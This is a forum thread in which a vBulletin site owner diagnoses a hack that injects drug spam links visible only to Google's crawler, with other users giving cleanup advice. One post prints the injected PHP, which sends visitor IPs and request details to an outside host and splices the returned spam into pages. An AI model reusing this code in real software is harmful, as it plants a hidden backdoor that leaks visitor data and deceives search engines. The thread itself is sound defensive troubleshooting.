Announcement

Collapse
No announcement yet.

It seems my website has been hacked. Weird google cache hack.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • It seems my website has been hacked. Weird google cache hack.

    OK so it seems my website has been hacked but the weird thing is the hack only appears at the bottom of the google cache of all my forum.

    http://webcache.googleusercontent.co...&ct=clnk&gl=en


    Without google cache I would never have noticed it.
    I don't know what the hackers changed.
    I searched the templates and found nothing.
    I searched the php files and found nothing.
    Even in the web source code of my pages there is nothing.

    Anyone knows what kind of hack is this and how to remove it?
    Last edited by Cobra SA; Tue 16 Aug '16, 8:55am.

  • #2
    The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

    Search the database in myphpadmin using keywords from the footer, it might be the result of a sql injection. I can't think of anything else.

    Comment


    • #3
      Originally posted by glennybee View Post
      The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

      Search the database in myphpadmin using keywords from the footer, it might be the result of a sql injection. I can't think of anything else.
      good idea I didn't think of searching the database, thanks
      I just did a search on "xanax" and "clonazepam" but not a single result.

      I'll take your advice and open a ticket with my host. But if anyone knows this type of hack please let me know.

      Comment


      • #4
        I would also consider whatever addons you have running. Especially if anything concerns the footer. Try turning the hook system off.
        If that doesnt work, change all your passwords, contact your host, download a clean zip of vbulletin 3.8.4 and after extracting upload the files to your site. Check if that helps. If it does, then upgrade to the latest version.
        If it doesnt Id consider to contact IB.
        I buy 420 forums

        Comment


        • #5
          Check your actual php (and js) files on the server.
          Baby, I was born this way

          Comment


          • #6
            Originally posted by Paul M View Post
            Check your actual php (and js) files on the server.
            I have downloaded all php js xml html ini files from my server.
            I opened them all at once in ultraedit, and searched them all for drug words like xanax, clonazepam... and ultraedit didn't find any match.

            Nothing in templates and phrases either.
            Last edited by Cobra SA; Tue 23 Nov '10, 3:00am.

            Comment


            • #7
              Just so you know, I will post the progress of my ticket with my host.

              Originally posted by Cobra SA
              Hello,

              My website has been hacked.
              The hack only appears in the footer of the google cache of my website pages.

              http://webcache.googleusercontent.co...&ct=clnk&gl=en

              Without google cache I would never have noticed it.


              I don't know what the hackers changed or how they proceeded.
              I downloaded and searched all .php, .js, .xml, .html, .ini files and I found nothing related to drugs.

              Even in the web source code of my pages there is nothing, this is really strange.

              Please look into this, this is possibly a hack in the server side.

              Best regards,

              My Name.

              Originally posted by My host
              Hello,

              No, this is impossible. In this case it'll affect all server's accounts.

              If you can't find anything.
              Please refer to Google via the link http://www.google.com/webmasters/tools/ so that reiterated that Google would rescan your page again.

              Please let us know if you need more help.
              Thank you.

              - -
              Kind regards,
              Kenny ***
              My host
              I will now proceed in taking their advice and asking google to rescan. Will let you know how things are going.

              EDIT: ticket opened at google/webmasters, damn they say it can take weeks, and they will not necessarily reply individually.
              Last edited by Cobra SA; Tue 23 Nov '10, 5:54am.

              Comment


              • #8
                Interesting thing to note, someone at the google forums suggested that the code might only show up when the visitor is googlebot and it appears this is right, bing and yahoo cache have no trace of the malicious code:

                http://cc.bingj.com/cache.aspx?q=mug...020bd,787e0e2c

                http://74.6.146.127/search/cache?ei=...IpnLrLd6W_Qg--

                Can that help me locate the malicious code? Maybe using the drugs as key word to search the malicious code was not the good strategy, maybe the malicious code inserts the drug links inside my web page on the fly whenever googlebot is visiting.

                Anyone could point me how to look for the malicious code with these new infos?
                Last edited by Cobra SA; Tue 16 Aug '16, 8:56am.

                Comment


                • #9
                  I checked the date of the files on my FTP and one mainstream vB file is newer than all other files, this is pretty suspicious.

                  The file is includes/functions.php and I don't see why its date is not the same as other mainstream vB php files.

                  Besides I found some code related to google bot inside. Is this normal code?

                  Code:
                      // This code use for global bot statistic
                      if(!(($nPos = strpos($vartext, '</body>')) === false) || !(($nPos = strpos($vartext, '</body>')) === false))
                      {
                          $sBonInfo = '';
                          $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
                          $stCurlHandle = NULL;
                          if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
                          {
                              if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
                              $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look'])); 
                          } else
                          {
                              if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
                              $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look'])); 
                          }
                          curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
                          $sBonInfo = curl_exec($stCurlHandle); 
                          curl_close($stCurlHandle); 
                          
                          $vartext = substr_replace($vartext, $sBonInfo, $nPos, 0);
                      } // Statistic code end
                      
                      $output = process_replacement_vars($vartext);
                  
                      if ($vbulletin->debug AND function_exists('memory_get_usage'))
                      {
                          $output = preg_replace('#(<!--querycount-->Executed <b>\d+</b> queries<!--/querycount-->)#siU', 'Memory Usage: <strong>' . number_format((memory_get_usage() / 1024)) . 'KB</strong>, \1', $output);
                      }

                  Comment


                  • #10
                    That seems fishy. Others have experienced the same with code that referenced safebotslogs.net
                    Now the question is: how did this get in your functions.php ?

                    I'd change all your ftp password. Scan all computers that have ftp access to your site. Deny access to any PC that does not need to have access. (white-listed IPs only)
                    Then download a fresh version of vb. Upload that.
                    Upgrade to latest vb3 version.
                    I buy 420 forums

                    Comment


                    • #11
                      No, that is not normal, and certainly not part of vbulletin.
                      Baby, I was born this way

                      Comment


                      • #12
                        Do you think the hackers could edit the functions.php by other means than FTP access, like exploiting a security flaw in vB 3.8.4 or vBAdvanced 3.1.0 ?

                        I really can't find the slightest malware on my system. It is fully scanned daily by KIS 2011 and Windows Defender, plus I always scan a new exe at virustotal.com before using it.


                        EDIT: My forum was hacked on 26/10/2010, I searched Kaspersky logs and check this out.

                        Code:
                        26/10/2010 11:04:36    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating     
                        28/10/2010 11:19:35    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Trusted    Signed by the digital signature of entrusted manufacturers    
                        31/10/2010 16:04:30    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating
                        Stupid Kaspersky allowed that INSTALLFLASHPLAYER.EXE without a digital signature to execute. >_< You can see that on 28/10, another INSTALLFLASHPLAYER.EXE executed itself but that one had a trusted digital signature.

                        Now the question is how to remove the trojans it may have installed if neither Kaspersky nor Windows Defender can detect it. I tried an online scan at bitdefender but it didn't find anything.
                        Last edited by Cobra SA; Wed 24 Nov '10, 12:20am.

                        Comment


                        • #13
                          I found a trace of the hacked in my ftp access log:

                          Mon Oct 25 09:50:39 2010 0 213.5.68.141 29421 /home/*domain*/public_html/forums/includes/cron/banners.php a _ i r *ftp-login* ftp 1 * c

                          I searched the IP 213.5.68.141 and I found two other people who got their FTP hacked by this IP
                          http://www.ipillion.com/ip/213.5.68.141

                          I am currently asking my host to restrict my FTP access to my IP range and ban that IP.

                          I will also ask google to blacklist http://safebotslogs.net
                          Last edited by Cobra SA; Wed 24 Nov '10, 4:54am.

                          Comment


                          • #14
                            Its always a good idea to only allow whitelisted IPs to ftp, or any other service that your members do not need. There are a mass of services that no one should have access to.
                            I assume you have changed all passwords and double checked all files on your server for irregularities?
                            I buy 420 forums

                            Comment


                            • #15
                              The hacker added the file /forums/includes/cron/banners.php
                              to my FTP. Is is possible it could have infected the database?
                              In that case how can I clean up the database?

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X